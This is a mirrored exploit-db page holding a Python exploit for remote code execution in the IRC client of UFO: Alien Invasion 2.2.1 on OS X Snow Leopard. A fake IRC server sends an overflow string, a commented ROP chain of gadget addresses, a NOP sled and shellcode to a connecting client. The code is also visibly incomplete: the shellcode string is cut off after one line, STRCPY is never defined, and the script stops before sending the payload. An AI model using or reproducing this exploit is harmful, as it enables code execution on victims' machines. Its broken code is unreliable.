UFO: Alien Invasion 2.2.1 (OSX Snow Leopard) – IRC Client Remote Code Execution (ROP)

  • 作者: d1dn0t
    日期: 2010-07-08
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/14272/
  • #!/usr/bin/python
    # UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution - MacOSX
    # OS X Snow Leopard: d1dn0t
    # OS X Leopard: dookie
    # Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013
    import sys, socket, struct
    WRITEABLE = 0x8fe66448
    shellcode = ("\xdb\xc3\xd9\x74\x24\xf4\xbb\xf3\xbd\x8d\x7c\x33\xc9\x5d\xb1"
    # ==================== Put stack pointer into EAX/EDX ==================== 
    ROP = 	struct.pack('<I',0x8fe2b3d4)# POP - RET Insturction - Pop's over the writeable value below
    ROP += 	struct.pack('<I',WRITEABLE)					# Required Writeable address here for exploit to work
    ROP += 	struct.pack('<I',0x8fe2fb63)				# pop eax # ret
    ROP += 	struct.pack('<I',WRITEABLE)					# Pop writeable address into eax for instructions below
    ROP += 	struct.pack('<I',0x8fe2fb58)				# push esp # and al,0x4 # mov [eax+0x28],edx # mov edx,[esp] # mov [eax],edx # pop eax # ret 
    # ==================== Jump Over Parameters below ==================== 
    ROP += 	struct.pack('<I',0xffff1d6b)				# add esp,byte +0x1c # pop ebp # ret
    # ==================== strcpy call ==================== 
    ROP += 	struct.pack('<I',STRCPY)						# use strcpy to copy shellcode from stack to heap
    ROP += 	struct.pack('<I',0x8fe2dfd1)				# POP - POP - RET over strcpy params
    ROP += 	struct.pack('<I',WRITEABLE)					# Dst Param for strcpy
    ROP += 	'EEEE'															# Src Param for strcpy
    ROP += 	struct.pack('<I',WRITEABLE)					# Move execution to where we moved our shell
    ROP += 	'C'*12															# Padding 
    # ==================== Craft Parameter 2==================== 
    # Need to inc EAX or EDX to point to shell code
    # Store0x40 in ECX
    ROP += 	struct.pack('<I',0x8fe2dae4)					# mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
    ROP += 	struct.pack('<I',0x8fe2b3d4) 	 		# POP - RET Insturction - Pop's over the value below
    ROP += 	struct.pack('<I',0xffffffff)					# Value to store in ecx
    ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
    ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
    ROP += 	struct.pack('<I',0x8fe24b3c)			 		# add ecx,ecx # ret
    ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
    ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
    ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
    # Replace stack pointer back into eax as it was trashed
    ROP += 	struct.pack('<I',0x8fe2c71d)					# mov eax,edx # ret
    # Add offset to paramter 
    ROP += 	struct.pack('<I',0x8fe2def4)					# add eax,ecx # ret
    # Swap over so we can work on fresh copy of saved ESP
    ROP += 	struct.pack('<I',0x8fe0e32d)					# xchg eax,edx
    # Double ECX a few more times to point to our nop sled/shell code
    ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
    ROP += 	struct.pack('<I',0x8fe0c0c7)					# inc ecx # xor al,0xc9
    ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
    ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
    ROP += 	struct.pack('<I',0x8fe24b3c)					# add ecx,ecx # ret
    # Add offset to shellcode 
    ROP += 	struct.pack('<I',0x8fe2def4)					# add eax,ecx # ret
    # Swap back
    ROP += 	struct.pack('<I',0x8fe0e32d)					# xchg eax,edx
    # Copy parameter to placeholder
    ROP += 	struct.pack('<I',0x8fe2fb61)					# mov [eax],edx # pop eax # ret
    ROP += 	'G'*4																	# junk
    # ==================== Call strcpy function ==================== 
    # Set our Stack pointer back to original value 
    ROP += 	struct.pack('<I',0x8fe0e32d)					# xchg eax,edx
    ROP += 	struct.pack('<I',0x8fe2daea)					# sub eax,ecx # ret
    # Return execution to our strdup call above
    ROP += 	struct.pack('<I',0x8fe0b1c2)					# xchg eax,ebp # inc ebp # ret 
    ROP += 	struct.pack('<I',0x8fe2b6a5)					# dec ebp # ret
    ROP += 	struct.pack('<I',0xffff01f3)					# mov esp,ebp # pop ebp # ret
    ROP += 	'G'*4																	# junk
    # ==================== Call Exploit code from heap ==================== 
    sploit = "001 :"
    sploit += "\x41" * 528
    sploit += ROP
    sploit += '\x90' * 10
    sploit += shellcode
    sploit += "\x0d\x0a"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(('', 6667))
    print ("[*] Listening on port 6667.")
    print ("[*] Have someone connect to you.")
    print ("[*] Type [control]-c to exit.")
    conn, addr = s.accept()
    print '[*] Received connection from: ', addr